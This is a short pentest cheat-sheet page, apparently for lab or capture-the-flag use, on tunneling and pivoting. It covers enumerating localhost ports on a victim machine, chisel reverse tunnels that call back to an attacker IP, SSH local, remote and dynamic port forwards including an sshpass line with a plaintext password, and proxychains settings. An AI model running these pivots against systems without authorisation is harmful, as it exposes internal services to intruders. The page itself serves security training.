Tunneling

Enumeration

On victim machine , check which port is listening on localhost (the port you want to transfer)

> netstat -an | findstr TCP | findstr 127.0.0.1

TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING
TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING

Chisel

On Attacker machine

chisel server -p <Listening-port> --reverse

chisel server -p 8000 --reverse

On Victim machine

c.exe client <attacker-IP>:<Listening-port> R:<victim-transfer-port>:localhost:<attacker-recieving-port>

.\chisel.exe client 10.10.14.20:8000 R:8888:localhost:8888

SSH

Inside session

# while inside ssh session
# 1. press enter 2 times
# 2. enter the below command
~C
# 3. this will diable commandline , sfter that enter the below commanding
-L 8443:127.0.0.1:8443
###############################
ssh -R 8443:127.0.0.1:8443 vaibhav@192.168.100.44

Outside the session

ssh -L [local-port]:[remote-ip]:[remote-port]
ssh -L 5000:127.0.0.1:5901 charix@10.10.10.84

###############################

sshpasswd -p 'password123' ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443

With proxychains

cat /etc/proxychains.conf
cat /etc/proxychains4.conf
> # meanwile
> # defaults set to "tor"
> socks4  127.0.0.1       9050
> socks5  127.0.0.1       9050

ssh -D 9050 -L 5901:127.0.0.1:5901 charix@10.10.10.84

PreviousFile Sharing NextNetwork Pentest

Last updated 1 year ago

hashtagEnumeration

hashtagChisel

hashtagSSH

Enumeration

Chisel

SSH